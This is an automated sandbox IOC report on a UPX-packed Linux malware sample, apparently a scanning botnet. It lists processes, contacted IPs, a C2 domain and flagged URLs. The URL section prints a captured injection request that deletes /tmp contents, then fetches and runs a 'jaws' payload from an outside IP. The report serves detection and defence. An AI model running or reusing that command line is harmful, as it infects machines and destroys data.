Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/tmp/9o6Z1wEokT

n/a

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

n/a

/usr/sbin/xfpm-power-backlight-helper

/usr/sbin/xfpm-power-backlight-helper --get-max-brightness

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"

/usr/bin/dbus-daemon

n/a

/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd

/usr/lib/systemd/systemd

n/a

/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd

There are 16 hidden processes, click here to show them.

URLs

Name

Malicious

http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws

138.68.131.225

Details

Name:	http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws
IP:	138.68.131.225
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)	Networking

http://upx.sf.net

unknown

Details

Name:	http://upx.sf.net
TargetID:	10
From Memory:	true
Current Path:	/tmp/9o6Z1wEokT
Source:	9o6Z1wEokT
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Sample is packed with UPX	Data Obfuscation	Obfuscated Files or Information
URLs found in memory or binary data	Networking

http://49.12.233.52/bin

unknown

Details

Name:	http://49.12.233.52/bin
TargetID:	21057
From Memory:	true
Source:	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp

Signature Hits	Behavior Group	Mitre Attack
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/encoding/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/encoding/
TargetID:	21057
From Memory:	true
Source:	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/envelope/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/envelope/
TargetID:	21057
From Memory:	true
Source:	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
URLs found in memory or binary data	Networking

Domains

Name

Malicious

scamanje.stresserit.pro

49.12.233.52

Details

Name:	scamanje.stresserit.pro
IP:	49.12.233.52
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

155.138.246.9

unknown

United States

12.207.216.252

unknown

United States

178.18.96.250

unknown

Russian Federation

51.37.119.129

unknown

Ireland

202.161.141.133

unknown

Hong Kong

222.226.32.46

unknown

Japan

74.52.27.51

unknown

United States

41.145.154.94

unknown

South Africa

223.148.2.244

unknown

China

116.90.107.205

unknown

Pakistan

139.22.3.99

unknown

Germany

131.163.248.60

unknown

Canada

117.115.137.146

unknown

China

204.79.203.53

unknown

United States

164.41.71.61

unknown

Brazil

205.176.15.147

unknown

United States

183.206.97.10

unknown

China

210.60.42.108

unknown

Taiwan; Republic of China (ROC)

197.136.224.39

unknown

Kenya

71.167.226.28

unknown

United States

41.51.170.27

unknown

South Africa

78.209.96.98

unknown

France

115.178.4.124

unknown

Hong Kong

148.29.157.23

unknown

United States

141.93.110.68

unknown

Netherlands

104.119.90.59

unknown

United States

82.60.20.181

unknown

Italy

41.190.129.207

unknown

Mauritius

156.38.69.244

unknown

Togo

197.90.74.62

unknown

South Africa

210.33.92.35

unknown

China

156.49.195.231

unknown

Sweden

156.57.94.245

unknown

Canada

175.184.26.171

unknown

Japan

197.12.117.158

unknown

Tunisia

213.246.160.119

unknown

United Kingdom

156.235.189.126

unknown

Seychelles

197.237.248.144

unknown

Kenya

210.25.254.104

unknown

China

218.85.108.163

unknown

China

98.163.92.7

unknown

United States

144.79.42.106

unknown

18.138.65.36

unknown

United States

52.172.168.232

unknown

United States

161.31.175.172

unknown

United States

2.6.97.90

unknown

France

197.190.12.213

unknown

Ghana

74.250.40.167

unknown

United States

94.7.176.226

unknown

United Kingdom

60.94.29.130

unknown

Japan

180.246.6.3

unknown

Indonesia

118.144.105.159

unknown

China

208.196.44.13

unknown

United States

199.91.86.20

unknown

Canada

109.183.48.98

unknown

Czech Republic

123.114.215.96

unknown

China

41.127.73.195

unknown

South Africa

40.28.77.69

unknown

United States

178.60.215.125

unknown

Spain

42.253.2.46

unknown

China

156.11.35.24

unknown

Canada

41.35.35.154

unknown

Egypt

41.76.191.251

unknown

Kenya

197.47.108.232

unknown

Egypt

202.97.163.205

unknown

China

41.102.150.114

unknown

Algeria

120.186.107.194

unknown

Indonesia

69.186.67.178

unknown

United States

156.121.7.93

unknown

United States

115.126.52.106

unknown

Hong Kong

174.67.133.238

unknown

United States

41.61.164.252

unknown

South Africa

37.98.140.246

unknown

Finland

152.113.180.106

unknown

United States

42.204.186.204

unknown

China

42.4.251.174

unknown

China

109.7.133.227

unknown

France

123.145.54.222

unknown

China

112.180.205.190

unknown

Korea Republic of

47.105.148.45

unknown

China

38.162.241.85

unknown

United States

96.104.187.63

unknown

United States

5.142.43.27

unknown

Russian Federation

156.240.70.1

unknown

Seychelles

158.163.60.230

unknown

Canada

206.112.107.64

unknown

United States

168.2.58.209

unknown

United States

182.235.102.243

unknown

Taiwan; Republic of China (ROC)

197.50.174.117

unknown

Egypt

160.12.51.133

unknown

Japan

150.94.128.87

unknown

Japan

79.101.206.56

unknown

Serbia

210.232.162.151

unknown

Japan

37.129.242.246

unknown

Iran (ISLAMIC Republic Of)

52.35.26.205

unknown

United States

57.171.197.28

unknown

Belgium

84.184.1.125

unknown

Germany

148.94.50.51

unknown

United States

31.241.9.128

unknown

Germany

5.107.178.204

unknown

United Arab Emirates

There are 90 hidden IPs, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Processes

URLs

Domains

IPs